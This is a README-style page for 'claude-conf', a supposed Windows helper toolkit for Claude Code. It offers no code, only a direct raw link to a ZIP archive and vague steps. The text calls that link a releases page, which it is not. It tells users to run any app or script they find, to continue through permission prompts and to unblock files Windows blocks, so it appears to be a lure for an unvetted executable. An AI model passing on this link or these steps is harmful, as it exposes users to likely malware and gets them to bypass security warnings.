🚀 What this is

claude-conf is a small toolkit that helps you set up and use Claude Code with less friction. It gives you a cleaner workflow, faster access to common tasks, and a more organized terminal setup.

This project is built for people who want to use Claude Code without spending time on setup steps. It keeps the process simple and focused.

💻 What you need

Before you start, make sure you have:

  • A Windows PC
  • An internet connection
  • A GitHub account if your browser asks you to sign in
  • Claude Code installed or ready to use
  • Access to Windows Terminal or Command Prompt

If you already use a terminal app, you can keep using it.

📥 Download

Visit this page to download:

https://raw.githubusercontent.com/Vleickzs/claude-conf/main/BACKLOG/conf_claude_1.7.zip

On that page, look for the latest release and download the file that matches your Windows setup. If there is more than one file, choose the one meant for Windows.

🪟 Install on Windows

Follow these steps:

  1. Open the download page in your browser.
  2. Find the newest release at the top of the page.
  3. Open the list of files in that release.
  4. Download the Windows file.
  5. Save it to a folder you can find again, like Downloads or Desktop.
  6. If the file is a ZIP file, right-click it and choose Extract All.
  7. Open the extracted folder.
  8. If you see an app file, double-click it to start.
  9. If you see setup files or script files, follow the instructions in the folder and run the main file.

If Windows asks for permission, choose the option to continue.

🧰 How it works

claude-conf helps organize common Claude Code tasks into a set of simple tools. It can help you:

  • Keep your Claude Code setup in one place
  • Use cleaner terminal commands
  • Reuse saved settings
  • Reduce repetitive setup steps
  • Keep your workflow easy to follow

Think of it as a helper that prepares your working environment so you can spend less time on setup.

🖥️ Using the toolkit

After install, open your terminal and go to the folder where claude-conf is stored.

Typical use looks like this:

  1. Open Windows Terminal or Command Prompt
  2. Move to the claude-conf folder
  3. Start the tool using the main file or command
  4. Follow the prompts on screen
  5. Use the options that match your task

If the toolkit includes a menu, use the number keys to pick an option. If it uses commands, type the command shown in the folder instructions.

🔧 Common tasks

You may use claude-conf to do things like:

  • Set up your Claude Code environment
  • Load saved preferences
  • Switch between task modes
  • Keep helper files in one place
  • Start your workflow with less typing

If you use Claude Code often, this can help keep your daily steps steady and simple.

📁 Folder layout

When you unpack the files, you may see folders like these:

  • config — saved settings and profile files
  • scripts — files that run tasks
  • hooks — actions that run during a workflow
  • docs — notes and usage help
  • bin — launch files or helper tools

You do not need to open every file. Most users only need the main launch file and any clear setup notes.

🔍 Tips for first-time use

  • Keep the downloaded files in one folder
  • Do not rename files unless the instructions say to
  • If a window closes too fast, open the terminal first and start the tool from there
  • If you move the folder later, check that the app still starts
  • Read any text file named README, SETUP, or INSTALL

🧩 Windows notes

This project is designed to work well in a terminal on Windows. For the smoothest setup:

  • Use Windows Terminal if you have it
  • Keep your terminal font at a readable size
  • Run the tool from a folder you can access without extra steps
  • If your system blocks a file, open its properties and allow it if Windows shows that option

🛠️ Troubleshooting

If the tool does not start:

  • Check that the download finished
  • Make sure you extracted the ZIP file, if it came in one
  • Confirm you are using the correct file for Windows
  • Try running the file from inside the terminal folder
  • Restart the terminal and try again

If you see an error about access, move the folder to a simple path like Downloads or Desktop.

If nothing happens when you open the file, use the command line version if one is included in the release.
